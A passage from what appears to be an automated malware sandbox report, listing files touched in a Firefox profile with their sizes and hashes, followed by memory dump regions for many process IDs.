                                                                                bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

                                                                                SHA512

                                                                                79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uxecp77c.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

                                                                                Filesize

                                                                                17.8MB

                                                                                MD5

                                                                                daf7ef3acccab478aaa7d6dc1c60f865

                                                                                SHA1

                                                                                f8246162b97ce4a945feced27b6ea114366ff2ad

                                                                                SHA256

                                                                                bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

                                                                                SHA512

                                                                                5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uxecp77c.default-release\prefs-1.js

                                                                                Filesize

                                                                                9KB

                                                                                MD5

                                                                                d0a811098a2dec74c36e429b0c27cdfe

                                                                                SHA1

                                                                                326dc45e41e404b9f335418e543e750c582e94b1

                                                                                SHA256

                                                                                bb14f78f52ef7bc814e27b00eb86a2618af24e8ff4ffc364f46f29efe5fbac12

                                                                                SHA512

                                                                                2ad0fff679a97ac008b8bf96e5570c3035f4b11c3da43065299e9b7c0b33ca2246cd71d6ee8e40c987d8f66d9ab7efb2605c940881980a5d71a538552beda0e1

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uxecp77c.default-release\prefs-1.js

                                                                                Filesize

                                                                                10KB

                                                                                MD5

                                                                                3bb927187176f5991b417a497ec7eefc

                                                                                SHA1

                                                                                ed5227d5d0ece57267cd797fdaf6122b09f5670c

                                                                                SHA256

                                                                                15841ecb1af1f96a3ea836b72d202bf5bf17bacbe5ee11e5c71a68da5255e0f8

                                                                                SHA512

                                                                                c9e678185d986407ede05e85084abf1d6f358e00412c0be02aca94672a2c371bb1286d338a758a9e762f77dcaa8443feebc707e0d65d0a2e2a80dbab24be9cdb

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uxecp77c.default-release\prefs-1.js

                                                                                Filesize

                                                                                14KB

                                                                                MD5

                                                                                82fedee3fd0a5dee752a619af626d8c7

                                                                                SHA1

                                                                                57fd5617b7b1ade1a7014a93ff289d4d638af039

                                                                                SHA256

                                                                                19a96a7f9665e02c608645f8f7442f9b93f5b27f242e34755995dfbd7da9c93e

                                                                                SHA512

                                                                                412d7d3fc6b1e4bf31ed3ded799099523a8e1f75310c6dff87e618bef61deb125a5579fa4453ff2005eadf6a7131304aaba4aeed9d317cc870e9d5cc9cb84158

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uxecp77c.default-release\prefs.js

                                                                                Filesize

                                                                                9KB

                                                                                MD5

                                                                                9d98a3107fcac600cde69ce2f15c3c82

                                                                                SHA1

                                                                                f72ca1279c0ba2561978a6fd4e618f5bc2a4aa3e

                                                                                SHA256

                                                                                55c93d385d0d835e7f875ec8da8f78b0daf1fbbed37e727199dd995f3c166543

                                                                                SHA512

                                                                                f4f826991b287edb52552eb248d63f5aa43ab1bab47c1dfbc0bb90b2bb983f0e56f3c25e1e5cd8089195f56170cde3f31d56e7c6a7add2cf227acb078b916048

                                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uxecp77c.default-release\security_state\data.safe.bin

                                                                                Filesize

                                                                                3.0MB

                                                                                MD5

                                                                                9bfd943b0d5128f426bb27adfc6e9927

                                                                                SHA1

                                                                                4de1c511e32bba47180a00bb8b19326d31fe2412

                                                                                SHA256

                                                                                bf9c94cdbf5c46b01fbd9e3bf9952ce76693d69fbaef5d2e051837d2bd5e9295

                                                                                SHA512

                                                                                62b3e8de55efc410a59b65de8c267c0920da0f329ade6783495dea2845df13bab1b76b17799ae77aa7ef7c0db6b087ec2394202db17fe33167b663ff2edcda5a

                                                                              • memory/228-17-0x00000000004A0000-0x0000000000958000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/228-15-0x00000000771B4000-0x00000000771B6000-memory.dmp

                                                                                Filesize

                                                                                8KB

                                                                              • memory/228-31-0x00000000004A0000-0x0000000000958000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/228-18-0x00000000004A0000-0x0000000000958000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/228-14-0x00000000004A0000-0x0000000000958000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/228-16-0x00000000004A1000-0x00000000004CF000-memory.dmp

                                                                                Filesize

                                                                                184KB

                                                                              • memory/428-51-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                Filesize

                                                                                400KB

                                                                              • memory/428-53-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                Filesize

                                                                                400KB

                                                                              • memory/436-2859-0x0000000000BD0000-0x0000000001088000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/436-167-0x0000000000BD0000-0x0000000001088000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/436-1159-0x0000000000BD0000-0x0000000001088000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/436-997-0x0000000000BD0000-0x0000000001088000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/436-109-0x0000000000BD0000-0x0000000001088000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/436-1290-0x0000000000BD0000-0x0000000001088000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/436-32-0x0000000000BD0000-0x0000000001088000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/436-1991-0x0000000000BD0000-0x0000000001088000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/436-55-0x0000000000BD0000-0x0000000001088000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/436-3602-0x0000000000BD0000-0x0000000001088000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/436-54-0x0000000000BD0000-0x0000000001088000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/436-213-0x0000000000BD0000-0x0000000001088000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/1312-3353-0x0000000000740000-0x00000000009DC000-memory.dmp

                                                                                Filesize

                                                                                2.6MB

                                                                              • memory/1312-3372-0x0000000000740000-0x00000000009DC000-memory.dmp

                                                                                Filesize

                                                                                2.6MB

                                                                              • memory/1424-198-0x0000000000630000-0x0000000000CC0000-memory.dmp

                                                                                Filesize

                                                                                6.6MB

                                                                              • memory/1424-200-0x0000000000630000-0x0000000000CC0000-memory.dmp

                                                                                Filesize

                                                                                6.6MB

                                                                              • memory/2168-3963-0x00000000001C0000-0x0000000000220000-memory.dmp

                                                                                Filesize

                                                                                384KB

                                                                              • memory/2224-63-0x0000000000600000-0x0000000000AB4000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/2224-69-0x0000000000600000-0x0000000000AB4000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/2272-210-0x0000000000A80000-0x0000000000D88000-memory.dmp

                                                                                Filesize

                                                                                3.0MB

                                                                              • memory/2272-1002-0x0000000000A80000-0x0000000000D88000-memory.dmp

                                                                                Filesize

                                                                                3.0MB

                                                                              • memory/2272-214-0x0000000000A80000-0x0000000000D88000-memory.dmp

                                                                                Filesize

                                                                                3.0MB

                                                                              • memory/2272-164-0x0000000000A80000-0x0000000000D88000-memory.dmp

                                                                                Filesize

                                                                                3.0MB

                                                                              • memory/2296-102-0x0000000000700000-0x000000000099C000-memory.dmp

                                                                                Filesize

                                                                                2.6MB

                                                                              • memory/2296-106-0x0000000000700000-0x000000000099C000-memory.dmp

                                                                                Filesize

                                                                                2.6MB

                                                                              • memory/2348-236-0x00000000008D0000-0x0000000000D76000-memory.dmp

                                                                                Filesize

                                                                                4.6MB

                                                                              • memory/2348-182-0x00000000008D0000-0x0000000000D76000-memory.dmp

                                                                                Filesize

                                                                                4.6MB

                                                                              • memory/2348-168-0x00000000008D0000-0x0000000000D76000-memory.dmp

                                                                                Filesize

                                                                                4.6MB

                                                                              • memory/2348-133-0x00000000008D0000-0x0000000000D76000-memory.dmp

                                                                                Filesize

                                                                                4.6MB

                                                                              • memory/2512-128-0x000001A408220000-0x000001A40825C000-memory.dmp

                                                                                Filesize

                                                                                240KB

                                                                              • memory/2512-206-0x000001A409CD0000-0x000001A409D46000-memory.dmp

                                                                                Filesize

                                                                                472KB

                                                                              • memory/2512-127-0x000001A407E40000-0x000001A407E82000-memory.dmp

                                                                                Filesize

                                                                                264KB

                                                                              • memory/2512-212-0x000001A422C50000-0x000001A423178000-memory.dmp

                                                                                Filesize

                                                                                5.2MB

                                                                              • memory/2512-207-0x000001A409C00000-0x000001A409C1E000-memory.dmp

                                                                                Filesize

                                                                                120KB

                                                                              • memory/2512-1086-0x000001A409B80000-0x000001A409B8A000-memory.dmp

                                                                                Filesize

                                                                                40KB

                                                                              • memory/2568-57-0x0000000000C10000-0x0000000000F21000-memory.dmp

                                                                                Filesize

                                                                                3.1MB

                                                                              • memory/2568-36-0x0000000000C10000-0x0000000000F21000-memory.dmp

                                                                                Filesize

                                                                                3.1MB

                                                                              • memory/2568-56-0x0000000000C10000-0x0000000000F21000-memory.dmp

                                                                                Filesize

                                                                                3.1MB

                                                                              • memory/3164-2720-0x0000000000300000-0x0000000000364000-memory.dmp

                                                                                Filesize

                                                                                400KB

                                                                              • memory/3620-71-0x0000000000360000-0x00000000009FD000-memory.dmp

                                                                                Filesize

                                                                                6.6MB

                                                                              • memory/3620-66-0x0000000000360000-0x00000000009FD000-memory.dmp

                                                                                Filesize

                                                                                6.6MB

                                                                              • memory/3972-86-0x0000000000400000-0x0000000000463000-memory.dmp

                                                                                Filesize

                                                                                396KB

                                                                              • memory/3972-88-0x0000000000400000-0x0000000000463000-memory.dmp

                                                                                Filesize

                                                                                396KB

                                                                              • memory/3996-235-0x0000000000BD0000-0x0000000001088000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/3996-223-0x0000000000BD0000-0x0000000001088000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/4196-2073-0x0000000000ED0000-0x00000000018DE000-memory.dmp

                                                                                Filesize

                                                                                10.1MB

                                                                              • memory/4196-2153-0x0000000000ED0000-0x00000000018DE000-memory.dmp

                                                                                Filesize

                                                                                10.1MB

                                                                              • memory/4196-1376-0x0000000000ED0000-0x00000000018DE000-memory.dmp

                                                                                Filesize

                                                                                10.1MB

                                                                              • memory/4196-2372-0x0000000000ED0000-0x00000000018DE000-memory.dmp

                                                                                Filesize

                                                                                10.1MB

                                                                              • memory/4396-3383-0x0000000000400000-0x000000000042F000-memory.dmp

                                                                                Filesize

                                                                                188KB

                                                                              • memory/4396-3381-0x0000000000400000-0x000000000042F000-memory.dmp

                                                                                Filesize

                                                                                188KB

                                                                              • memory/5024-145-0x0000021CF7200000-0x0000021CF7222000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/5416-1859-0x0000000000130000-0x00000000005C2000-memory.dmp

                                                                                Filesize

                                                                                4.6MB

                                                                              • memory/5416-1744-0x0000000000130000-0x00000000005C2000-memory.dmp

                                                                                Filesize

                                                                                4.6MB

                                                                              • memory/5712-1201-0x0000000000BE0000-0x0000000001094000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/5712-1197-0x0000000000BE0000-0x0000000001094000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/5944-3217-0x00000000004B0000-0x00000000010E9000-memory.dmp

                                                                                Filesize

                                                                                12.2MB

                                                                              • memory/5944-2350-0x00000000004B0000-0x00000000010E9000-memory.dmp

                                                                                Filesize

                                                                                12.2MB

                                                                              • memory/5944-3222-0x00000000004B0000-0x00000000010E9000-memory.dmp

                                                                                Filesize

                                                                                12.2MB

                                                                              • memory/5944-3393-0x00000000004B0000-0x00000000010E9000-memory.dmp

                                                                                Filesize

                                                                                12.2MB

                                                                              • memory/6008-1000-0x0000000000590000-0x0000000000A44000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/6008-1004-0x0000000000590000-0x0000000000A44000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/6344-1200-0x0000000000560000-0x000000000085E000-memory.dmp

                                                                                Filesize

                                                                                3.0MB

                                                                              • memory/6344-1187-0x0000000000560000-0x000000000085E000-memory.dmp

                                                                                Filesize

                                                                                3.0MB

                                                                              • memory/6496-1079-0x00000000054B0000-0x0000000005804000-memory.dmp

                                                                                Filesize

                                                                                3.3MB

                                                                              • memory/6496-1081-0x00000000059F0000-0x0000000005A0E000-memory.dmp

                                                                                Filesize

                                                                                120KB

                                                                              • memory/6496-1065-0x0000000000C70000-0x0000000000CA6000-memory.dmp

                                                                                Filesize

                                                                                216KB

                                                                              • memory/6496-1066-0x0000000004E80000-0x00000000054A8000-memory.dmp

                                                                                Filesize

                                                                                6.2MB

                                                                              • memory/6496-1067-0x0000000004A30000-0x0000000004A52000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/6496-1068-0x0000000004CD0000-0x0000000004D36000-memory.dmp

                                                                                Filesize

                                                                                408KB

                                                                              • memory/6496-1069-0x0000000004D40000-0x0000000004DA6000-memory.dmp

                                                                                Filesize

                                                                                408KB

                                                                              • memory/6496-1099-0x0000000006E70000-0x0000000006E92000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/6496-1106-0x0000000007F60000-0x0000000008504000-memory.dmp

                                                                                Filesize

                                                                                5.6MB

                                                                              • memory/6496-1082-0x0000000005AA0000-0x0000000005AEC000-memory.dmp

                                                                                Filesize

                                                                                304KB

                                                                              • memory/6496-1085-0x0000000005F30000-0x0000000005F4A000-memory.dmp

                                                                                Filesize

                                                                                104KB

                                                                              • memory/6496-1084-0x0000000007330000-0x00000000079AA000-memory.dmp

                                                                                Filesize

                                                                                6.5MB

                                                                              • memory/6496-1098-0x0000000006F10000-0x0000000006FA6000-memory.dmp

                                                                                Filesize

                                                                                600KB

                                                                              • memory/6532-3701-0x000002959C150000-0x000002959C162000-memory.dmp

                                                                                Filesize

                                                                                72KB

                                                                              • memory/6952-1119-0x0000000000BE0000-0x0000000001094000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/6952-1116-0x0000000000BE0000-0x0000000001094000-memory.dmp

                                                                                Filesize

                                                                                4.7MB

                                                                              • memory/7140-1135-0x0000000006690000-0x00000000066DC000-memory.dmp

                                                                                Filesize

                                                                                304KB

                                                                              • memory/7140-1129-0x0000000005F50000-0x00000000062A4000-memory.dmp

                                                                                Filesize

                                                                                3.3MB

                                                                              • memory/7208-3705-0x0000000000EA0000-0x0000000000EDC000-memory.dmp

                                                                                Filesize

                                                                                240KB

                                                                              • memory/7208-3706-0x00000000030A0000-0x00000000030B2000-memory.dmp

                                                                                Filesize

                                                                                72KB

                                                                              • memory/7208-3707-0x0000000005880000-0x0000000005A42000-memory.dmp

                                                                                Filesize

                                                                                1.8MB

                                                                              • memory/7208-3708-0x0000000006840000-0x0000000006D6C000-memory.dmp

                                                                                Filesize

                                                                                5.2MB

                                                                              • memory/7208-3709-0x0000000007540000-0x00000000075D2000-memory.dmp

                                                                                Filesize

                                                                                584KB

                                                                              • memory/7320-2362-0x0000000000690000-0x00000000006BF000-memory.dmp

                                                                                Filesize

                                                                                188KB

                                                                              • memory/7320-2571-0x0000000010000000-0x000000001001C000-memory.dmp

                                                                                Filesize

                                                                                112KB

                                                                              • memory/7320-2367-0x0000000000690000-0x00000000006BF000-memory.dmp

                                                                                Filesize

                                                                                188KB

                                                                              • memory/7320-2368-0x0000000000690000-0x00000000006BF000-memory.dmp

                                                                                Filesize

                                                                                188KB

                                                                              • memory/7320-2283-0x0000000000690000-0x00000000006BF000-memory.dmp

                                                                                Filesize

                                                                                188KB

                                                                              • memory/7472-804-0x00000000002C0000-0x0000000000710000-memory.dmp

                                                                                Filesize

                                                                                4.3MB

                                                                              • memory/7472-1115-0x00000000002C0000-0x0000000000710000-memory.dmp

                                                                                Filesize

                                                                                4.3MB

                                                                              • memory/7472-905-0x00000000002C0000-0x0000000000710000-memory.dmp

                                                                                Filesize

                                                                                4.3MB

                                                                              • memory/7472-904-0x00000000002C0000-0x0000000000710000-memory.dmp

                                                                                Filesize

                                                                                4.3MB

                                                                              • memory/7472-1122-0x00000000002C0000-0x0000000000710000-memory.dmp

                                                                                Filesize

                                                                                4.3MB

                                                                              • memory/7512-2811-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                Filesize

                                                                                400KB

                                                                              • memory/7512-2812-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                Filesize

                                                                                400KB

                                                                              • memory/7976-1172-0x0000000005FE0000-0x000000000602C000-memory.dmp

                                                                                Filesize

                                                                                304KB